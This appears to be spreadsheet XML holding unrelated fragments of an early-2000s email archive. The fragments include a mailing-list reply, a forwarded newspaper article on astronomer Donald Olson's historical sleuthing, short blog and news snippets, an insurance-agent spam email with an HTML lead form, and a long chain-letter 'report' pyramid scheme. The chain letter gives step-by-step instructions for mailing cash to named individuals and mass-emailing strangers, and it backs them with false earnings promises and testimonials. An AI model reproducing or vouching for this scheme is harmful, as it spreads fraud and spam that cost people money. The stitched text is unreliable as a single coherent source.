 Could you send me relevant sections from the log file as well as
 your config?
 -- 
 Vipul Ved Prakash          |   "The future is here, it's just not 
 Software Design Artist     |    widely distributed."
 http://vipul.net/          |              -- William Gibson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</si>
  <si>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6.25 30 yr fixed. No points, No Fees ojd
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bits for posterity: Astronomical sleuthing
</t>
  </si>
  <si>
    <t xml:space="preserve">From: Donald Eastlake 3rd &lt;dee3@torque.pothole.com&gt;
 &lt;http://www.nytimes.com/2002/07/16/science/space/16MOON.html&gt;
 July 16, 2002
 By Yonder Blessed Moon, Sleuths Decode Life and Art
 By LEON JAROFF
 On its way back from the Pacific island of Tinian, where it had
 delivered the uranium core for the atomic bomb that destroyed Hiroshima,
 the heavy cruiser Indianapolis was torpedoed by the Japanese submarine
 I-58 and sent to the bottom of the Philippine Sea. It was one of the
 worst disasters in American naval history; only 317 of its nearly 1,200
 crew members survived.
 Now experts at Southwest Texas State University have given that tragic
 story a startling new twist.
 It was the moon, they say, that sank the Indianapolis. Or anyway, they
 write in the July issue of Sky &amp; Telescope, it was the moon that made
 the sinking possible.
 Using astronomical computer programs, records and weather reports, as
 well as the known coordinates and running speeds of the ship and the
 submarine that sank it, the authors determined that when the I-58
 surfaced, it was perfectly aligned, west to east, with the cruiser. And,
 they said, a three-quarter moon had just emerged from behind the clouds.
 Looking across the moonlit water, an I-58 crewman spotted the ship
 silhouetted against the sky, 10.3 miles away. Half an hour later, six
 torpedoes sent it to the bottom.
 "It was sheer chance," said Dr. Donald Olson, an astronomer. "Without
 that alignment with the moon, the lookouts would not have spotted the
 cruiser, especially at that distance."
 With Russell Doescher, a physics lecturer, Dr. Olson conducts a
 university honors course called "Astronomy in Art, History and
 Literature." In the last 15 years, he has pinpointed the time and place
 of the rendering of art masterpieces, given new interpretations of
 astronomical references in Chaucer and revealed the decisive role of the
 moon in military and other encounters.
 Two years ago, for example, Dr. Olson turned his attention to the bright
 star in van Gogh's "White House at Night." He and some students went to
 Auvers, France, where van Gogh created his final works, and searched
 until they found the house, largely unchanged. Sifting through letters
 from van Gogh to his brother, Dr. Olson found that the painting was
 completed in June 1890.
 Noting the orientation of the house in the painting, he determined where
 van Gogh had set his easel and what section of the sky he had portrayed,
 and from the lighting and shadows, he established that the house had
 been illuminated by the setting sun. His computer analysis then
 identified the "star." It was Venus, which in early evening in mid-June
 had occupied that part of the sky.
 A final check of local weather records pinpointed the actual date van
 Gogh had composed the painting, June 16, the only clear day in the
 middle of the month that year.
 Dr. Olson has also turned his attention to Shakespeare, intrigued by the
 opening of "Hamlet," when guards on the ramparts of Elsinor refer to the
 "star that's westward from the pole had made his course to illume that
 part of heaven where now it burns." From the guards' description, the
 season and the time, other astronomers had suggested several bright
 stars as possibilities, but Dr. Olson's calculations placed it in the
 constellation Cassiopeia, which lacks any notably luminous stars.
 Pondering this problem on a trip with his wife, Dr. Olson was suddenly
 inspired. He was aware that in 1572, a supernova, called Tycho's star,
 for the Danish astronomer Tycho Brahe, suddenly flamed in Cassiopeia,
 creating a worldwide sensation. Shakespeare, 8 at the time, would
 certainly have recalled the event, and his memory was probably refreshed
 by the description of the supernova in a history book that was the
 source of some of his best-known plays.
 Dr. Olson has no doubt that the star that glared above Elsinor that
 night was Tycho's, and he has an impressive record of other
 astronomy-based sleuthing.
 Aware that the photographer Ansel Adams often neglected to date his
 negatives, Dr. Olson set out to find when Adams had shot his classic
 "Moon and Half Dome." At Yosemite, Dr. Olson and his students found
 Adams's vantage point, studied the location, phase and features of the
 moon in the photograph, plus the shadows on the Dome, snow on the peak
 and other clues, and then announced that the picture had been taken at
 4:14 p.m., Dec. 28, 1960.
 Then, Dr. Olson calculated that the setting would be virtually identical
 at 4:05 p.m. on Dec. 13, 1994. On that day Adams's daughter-in-law
 visited Yosemite and was photographed holding a print of "Moon and the
 Half Dome" in the foreground of an eerily similar view of the actual
 moon and the Half Dome.
 Analyzing Chaucer's works, Dr. Olson has confirmed that a particularly
 rapid movement of the moon described in "The Merchant's Tale" occurred
 in April 1389. And in "The Franklin's Tale," Chaucer's description of
 the heavenly alignment that caused an exceptionally high tide on the
 Brittany coast, convinced Dr. Olson that Chaucer was an advanced amateur
 astronomer.
 Then there was Paul Revere. On his way to saddle up for his famous ride,
 how did he manage to row undetected past a British warship on a moonlit
 night in Boston Harbor? Dr. Olson's computer program revealed that,
 while the moon was nearly full that night, it was unusually close to the
 southern horizon and did not illuminate Revere's boat.
 Dr. Olson's proudest achievement was explaining "the tide that failed"
 in the bloody Marine Corps landing at Tarawa atoll on Nov. 20, 1943.
 Planners had expected a tide to provide a water depth of five feet over
 a reef some 600 yards from shore, allowing larger landing craft, with
 drafts of at least four feet, to pass.
 But that day and the next, in the words of some observers, "the ocean
 just sat there," providing neither low tide nor high tide and leaving a
 mean depth of three feet over the reef. The craft grounded on the edge
 of the reef, and many marines were killed or injured as they waded 600
 yards to the shore, rifles over their heads, in the face of machine-gun
 fire from the Japanese.
 Asked by a former marine about the tidal phenomenon, Dr. Olson spent six
 months researching and mastering tidal theory and discovered that the
 military planners were aware that they had to contend with a "neap"
 tide. This phenomenon occurs twice a month when the moon is near its
 first or last quarter, because the countering tug of the sun causes
 water levels to deviate less.
 But that day, the moon was also almost at its farthest point from earth
 and exerted even less pull, leaving the waters relatively undisturbed
 and the marines in trouble.
 "I'm not in the least blaming the planners," Dr. Olson said, explaining
 that the techniques used in accurately determining tides hadn't been
 applied to the waters at Tarawa.
 Indeed, he modestly claims, by using his computer program, "We can
 calculate the tides in any port in the world on any day in history."
 Yet Dr. Olson's greatest satisfaction seems to stem from his
 interdisciplinary approach to astronomical sleuthing. "I have thought
 about van Gogh, about Shakespeare and Chaucer," he says, "and that has
 made my life as a scientist much richer."
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FreeBSD or Linux for your MySQL Server?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000203.html
 Date: 2002-09-30T17:22:34-08:00
 This is an issue that comes up all the time at work. It is an issue for roughly 
 four reasons: Yahoo is a FreeBSD shop Someone has heard that MySQL runs better 
 on Linux Someone knows that we run some...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: South Korea bans all human cloning
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8251866,1440/
 Date: Not supplied
 New laws, prompted by earlier cloning claims, promise 10 years in jail for 
 offenders - but the blanket ban angers scientists
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0007_01C22DB1.C4B80210
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Non-Med Level Term 15-20 &amp; 30 year with Return of Premium Rider!	
  It's Lucrative:	
  	 Commission so high we can't publish them
 Annualization Available 	
 Daily Commission by EFT 	
  It's Fast:	
  	 Qualifying policies processed in 4 days or company pays you
 $100.00 	
 Forms and Status from Internet 	
  It's Easy:	
  	 Non-medical underwriting (No Blood, No HOS, No Exam)* 	
  	 Ages 0-60	 $100,000	 
  	 Ages 61-70	 $50,000	 
  	 Easy To Complete Application 	
 Fax Application to Home Office (No Need to Mail Original) 	
  888-574-9088	
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	 	
 M14070PBL602
 *Issuance of the policy based on answers to medical questions
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_0007_01C22DB1.C4B80210
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Commissions Too High to Publish&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;p align=3D"center"&gt;=20
   &lt;table width=3D"550" border=3D"2" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#6633CC"&gt;
     &lt;tr&gt;
       &lt;td&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/top2.jpg" =
 width=3D"550" height=3D"150" alt=3D'Non-Med Level Term 15-20 &amp; 30 year =
 with Return of Premium Rider!'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/lucrativ.gif" =
 width=3D"145" height=3D"36" alt=3D"It's Lucrative:"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4" bgcolor=3D"#FFFFFF"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"17" rowspan=3D'3'&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"517"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Commission so high we can't publish them&lt;br&gt;
               &lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"517"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Annualization Available &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"517"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Daily Commission by EFT
               &lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/fast.gif" =
 width=3D"145" height=3D"36" alt=3D"It's Fast:"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4" bgcolor=3D"#FFFFFF"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"17" rowspan=3D'2'&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"517"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Qualifying policies processed in 4 days or company pays =
 you $100.00
               &lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"517"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Forms and Status from Internet
               &lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/easy.gif" =
 width=3D"145" height=3D"36" alt=3D"It's Easy:"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"17" bgcolor=3D"#FFFFFF"&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"517" bgcolor=3D"#FFFFFF"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 color=3D"#003399" size=3D"2"&gt;&lt;b&gt;
                 Non-medical underwriting (No Blood, No HOS, No =
 Exam)*&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"3" bgcolor=3D"#FFFFFF"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"119"&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"151"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;Ages 0-60&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;td width=3D"263"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;$100,000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"119"&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"151"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;Ages 61-70&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;td width=3D"263"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;$50,000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4" bgcolor=3D"#FFFFFF"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"16" rowspan=3D"2"&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"518"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Easy To Complete Application&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"518"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 color=3D"#003399" size=3D"2"&gt;&lt;b&gt;
                 Fax Application to Home Office (No Need to Mail =
 Original)&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/phone.jpg" =
 width=3D"550" height=3D"109" alt=3D'888-574-9088'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr bgcolor=3D"#6633CC"&gt;=20
                           &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;&lt;font =
 color=3D"#FFFFFF"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2" face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;City:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"30%"&gt;=20
                             &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/td&gt;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value=3D"lpi@skyenet.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"Life Pros Inquiry"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/logo.gif" =
 width=3D"550" height=3D"73"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#CCCCCC"&gt;=20
               &lt;div align=3D"center"&gt;&lt;font color=3D"#000000" size=3D"2" =
 face=3D"Arial, Helvetica, sans-serif"&gt;M14070PBL602&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#CCCCCC" height=3D"2" align=3D"center"&gt;=20
                 &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"1"&gt;*Issuance=20
                   of the policy based on answers to medical =
 questions&lt;br&gt;
                   We don't want anybody to receive our mailing who does =
 not wish=20
                   to receive them. This is a professional communication =
 sent to=20
                   insurance professionals. To be removed from this =
 mailing list,=20
                   DO NOT REPLY to this message. Instead, go here: &lt;a =
 href=3D"http://www.insurancemail.net"&gt;http://www.insurancemail.net&lt;/a&gt;&lt;br=
 &gt;
                   &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;=20
                 &lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_0007_01C22DB1.C4B80210--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] RE: Take The Steps To Wealth For $25.  Do It NOW 26138654332222
</t>
  </si>
  <si>
    <t xml:space="preserve">Updated May 9, 2002 ...
 READ THIS! YOU'LL BE HAPPY YOU DID!
  A recent survey by Nielsen/Netratings says that "The Internet
 population is rapidly approaching a 'Half a Billion' People!"    
 SO WHAT DOES ALL THIS MEAN TO YOU?
 Let's assume that every person has 'only' one E-mail address.
 That's 500 million potential customers and growing! In addition,
        "E-mail is without question the most powerful
         method of distributing information on earth"
 Well, I think you get the picture. The numbers and potential are
 just staggering, but it gets even better ...
 START YOUR OWN E-MAIL BUSINESS TODAY &amp; ENJOY
 THE FOLLOWING BENEFITS:
 *********************************************************
 1. ALL CUSTOMERS PAY YOU IN CASH
 2. YOU WILL SELL A PRODUCT WHICH COSTS NOTHING TO PRODUCE
 3. YOUR ONLY MAJOR OVERHEAD IS YOUR TIME
 4. YOU HAVE 100s OF MILLIONS OF POTENTIAL CUSTOMERS
 5. YOU GET DETAILED, EASY TO FOLLOW STARTUP INSTRUCTIONS
 ********************************************************
 AND THIS IS JUST THE TIP OF THE ICEBERG ...
 As you read on you'll discover how a 'Seen on National TV'
 program is paying out excellent returns, every 4 to 5 months
 from your home, for a minimal initial startup investment of
 only $25 US Dollars. ALL THANKS TO THE COMPUTER AGE
 AND THE INTERNET!
 This is the letter you have been hearing a lot about recently.
 Due to the popularity of this letter on the Internet, a national
 weekly news program recently devoted an entire show to the
 investigation of this program described below, to see if it really
 can make people money.
 This is what one had to say: '' Thanks to this profitable 
 opportunity. I was approached many times before but each time 
 I passed on it.  I am so glad I finally joined just to see what 
 one could expect in return for the minimal effort and money 
 required.  To my astonishment, I received a 6 figure income 
 in 21 weeks, with money still coming in''.
 Pam Hedland, Fort Lee, New Jersey.
 =====================================================================
 Here is another testimonial: '' this program has been around for 
 a long time but I never believed in it.  But one day when I received 
 this again in the mail I decided to gamble my $25 on it.  I followed 
 the simple instructions and walaa ..... 3 weeks later the money 
 started to come in.  First month I only made a small amount of money,  
 but the next 2 months after that I made a total of a good 6 figures.  
 So far, in the past 8 months by re-entering the program, I have made 
 a lot more and I am playing it again.  The key to success in this 
 program is to follow the simple steps and NOT change anything.''  
 =====================================================================
 More testimonials later but first:
 *****PRINT THIS NOW FOR YOUR FUTURE REFERENCE &amp; FOLLOW THESE
 SIMPLE INSTRUCTIONS TO MAKE YOUR FINANCIAL DREAMS TRUE! *****
 INSTRUCTIONS:
 ============
 **** Order all 5 reports shown on the list below.
 **** For each report, send $5 U.S. CASH, THE NAME &amp; NUMBER
 OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS to
 the person whose name appears ON THAT LIST next to the report.
   MAKE SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE
   TOP LEFT CORNER in case of any mail problems.
   **** When you place your order, make sure
        you order each of the 5 reports ****
 You will need all 5 reports so that you can save them on your
 computer and resell them.
 YOUR UP-FRONT COST is ONLY $5 X 5 = $25.00.
 *********Within a few days you will receive, via e-mail, each
 of the 5 reports from these 5 different individuals. Save
 them on your computer so they will be accessible for you to
 send to the 1,000's of people who may order from you.
 Also make a floppy of these reports and keep it at your desk
 in case something happens to your computer.
 **********IMPORTANT - DO NOT alter the names of the people
 who are listed next to each report, or their sequence on the
 list, in any way other than what is instructed below in steps
 1 through 6 or you will loose out on majority of your profits.
 Once you understand the way this works, you will also see how
 it does not work if you change it.
 Remember, this method has been tested, and if you alter,
 it will NOT work! People have tried to put their friends/relatives
 names on all five thinking they could get all the money. But it
 does not work this way. Believe us, we all have tried to be greedy
 and then nothing happened.
 So do not try to change anything other than what is instructed.
 Because if you do, it will not work for you.  Remember,
 honesty reaps the reward!!!
 1. After you have ordered all 5 reports, take this
 advertisement and REMOVE the name &amp; address of the person in
 REPORT # 5. This person has made it through the cycle and is
 no doubt counting their money.
 2. Move the name &amp; address in REPORT # 4 down TO REPORT # 5.
 3. Move the name &amp; address in REPORT # 3 down TO REPORT # 4.
 4. Move the name &amp; address in REPORT # 2 down TO REPORT # 3.
 5. Move the name &amp; address in REPORT # 1 down TO REPORT # 2.
 6. Insert YOUR name &amp; address in the REPORT # 1 Position.
 PLEASE MAKE SURE you copy every name &amp; address ACCURATELY!
 =========================================================
 Take this entire letter, with the modified list of names,
 and save it on your computer. DO NOT MAKE ANY OTHER CHANGES.
 Save this on a disk as well just in case if you loose any
 data.
 To assist you with marketing your business on the Internet,
 the 5 reports you purchase will provide you with invaluable
 marketing information that includes: How to send bulk e-mails
 legally, Where to find thousands of free classified ads and
 much, much more.
 There are 2 Primary methods to get this venture going:
   METHOD # 1: SENDING BULK E-MAIL LEGALLY
   =======================================
 Let's say that you decide to start small, just to see how
 it goes, and we will assume you and those involved send out
 only 5,000 e-mails each.  Let's also assume that the mailing
 receive only a 0.2% response (the response could be much
 better but lets just say it is only 0.2%. Also, many people
 may send out hundreds of thousands e-mails instead of only
 5,000 each).
 Continuing with this example, you send out only 5,000 e-mails.
 With a 0.2% response, that is only 10 orders for report #1.
 Those 10 people responded by sending out 5,000 e-mail each
 for a total of 50,000.  Out of those 50,000 e-mails only 0.2%
 responded with orders.  That's = 100 people responded and
 ordered Report #2. Those 100 people mail out 5,000 e-mails
 each for a total of 500,000 e-mails.  The 0.2% response to
 that is 1000 orders for Report #3.
 Those 1000 people send out 5,000 e-mails each for a total of
 5 million e-mails sent out.  The 0.2% response to that is
 10,000 orders for Report #4.  Those 10,000 people send out
 5,000 e-mails each for a total of 50,000,000 (50 million)
 Emails.  The 0.2% response to that is 100,000 orders for
 Report #5.
 THAT'S 100,000 ORDERS TIMES $5 EACH = $500,000.00 (a half
 million).
   Your total income in this example is:
   1..... $50 +
   2..... $500 +
   3..... $5,000 +
   4..... $50,000 +
   5..... $500,000 ......... Grand Total = $555,550.00
   NUMBERS DO NOT LIE.  GET A PENCIL &amp; PAPER AND FIGURE OUT
   THE WORST POSSIBLE RESPONSES AND NO MATTER HOW YOU
   CALCULATE IT, YOU CAN STILL MAKE MONEY!
 -----------------------------------------------------------
   REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE
   ORDERING OUT OF 5,000 PEOPLE YOU MAILED.
 Dare to think for a moment what would happen if everyone,
 or 1/2, or even one 1/5 of those people mailed 100,000 e-mails
 each or more?  There are over 500 million people on the
 Internet worldwide and counting.  Believe me, many people
 may do just that, and more!
   METHOD # 2: PLACING FREE ADS ON THE INTERNET
   ===================================================
 Advertising on the net is very, very inexpensive and there
 are hundreds of FREE places to advertise.  Placing a lot of
 free ads on the Internet can easily get a larger response.
 We strongly suggest you start with Method # 1 and add METHOD
 # 2 as you go along.
 For every $5 you receive, all you must do is e-mail them the
 Report they ordered.  That's it!  Always provide same day
 service on all orders. This will guarantee that the emails
 they send out, with your name and address on it, will be
 prompt because they can not advertise until they receive the
 report.
   ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY.
 Note:  Always send $5 cash (U.S. CURRENCY) for each Report.
 Checks or money orders are NOT accepted.  Make sure the cash
 is wrapped in at least 2 sheets of paper before you put it in
 the envelope. On one of those sheets of paper, write the NUMBER
 and the NAME of the Report you are ordering, your email ADDRESS,
 your NAME and postal address. Make sure you affix proper
 'International' Postage if ordering a report from outside your
 country.
 PLACE YOUR ORDER FOR THESE REPORTS NOW:
 =============================================================
 Report 1: The Insider's Guide To Advertising for Free On 
 The Net ... Order from:
 P. Hynes
 6461 Mayfield Rd
 Brampton, ON
 Canada
 L6T 3Z8
 Report 2: The insiders Guide To Sending Bulk E-mail On The Net 
 ... Order from:
 Lynn Asbill
 9400 Bluebonnet Dr
 Scurry, TX
 75158
 USA
 Report 3: Secret To Multilevel Marketing On The Net 
 ... Order from:
 Greg Grant
 Po Box 385
 Wilberforce, ON
 Canada
 K0L 3C0
 Report 4: How To Become A Millionaire Using MLM &amp; The Net 
 ... Order from:
 LW
 50 Burnhamthorpe Rd W Suite 401
 Mississauga, ON
 Canada
 L5B 3C2
 Report 5: How To Send Out One Million Emails &amp; Jump Start Your 
 Business ... Order from:
 BDM Consulting
 PO Box 890
 Orem, UT
 84059
 USA
 =============================================================
 There are currently almost 500,000,000 people online
 worldwide!
   $$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$
 Follow these guidelines to guarantee your success:
 *************************************************
 If you do not receive at least 10 orders for Report #1 within
 2 weeks, continue sending e-mails until you do.
 After you have received 10 orders, 2 to 3 weeks after that
 you should receive 100 orders or more for Report #2.  If you
 did not, continue advertising or sending e-mails until you do.
 Once you have received 100 or more orders for Report #2, YOU
 CAN RELAX, because the system is already working for you!
 THIS IS IMPORTANT TO REMEMBER: Every time your name is moved
 down on the list, you are placed in front of a different report.
 You can KEEP TRACK of your PROGRESS by watching which report
 people are ordering from you.
   IF YOU WANT TO GENERATE MORE INCOME SEND ANOTHER BATCH OF
 E-MAILS AND START THE WHOLE PROCESS AGAIN!!!
   ____________________________________________________
   FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THIS PROGRAM:
 Follow the program EXACTLY AS INSTRUCTED. Do not change it
 in any way.  It works exceedingly well as it is now.
 Remember to e-mail a copy of this exciting report after you
 have put your name and address in Report #1 and moved others
 to #2...........# 5 as instructed above.  One of the people
 you send this to may send out 100,000 or more e-mails and your
 name will be on every one of them.  Remember though, the more
 you send out the more potential customers you will reach.
 So my friend, I have given you the ideas, information,
 materials and opportunity .... IT IS UP TO YOU NOW!
 ==================== MORE TESTIMONIALS======================
 '' My name is Mitchell.  My wife, Jody and I live in Chicago.  
 I am an accountant with a major U.S. Corporation and I make 
 pretty good money.  When I received this program I grumbled 
 to Jody about receiving ''junk mail''.  I made fun of the 
 whole thing, spouting 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so many orders and ... all cash! I was shocked.  I
 have joined Jody in her ''hobby''. 
 Mitchell Wolf M.D., Chicago, Illinois
 ===============================================================
 '' Not being the gambling type, it took me several weeks to make 
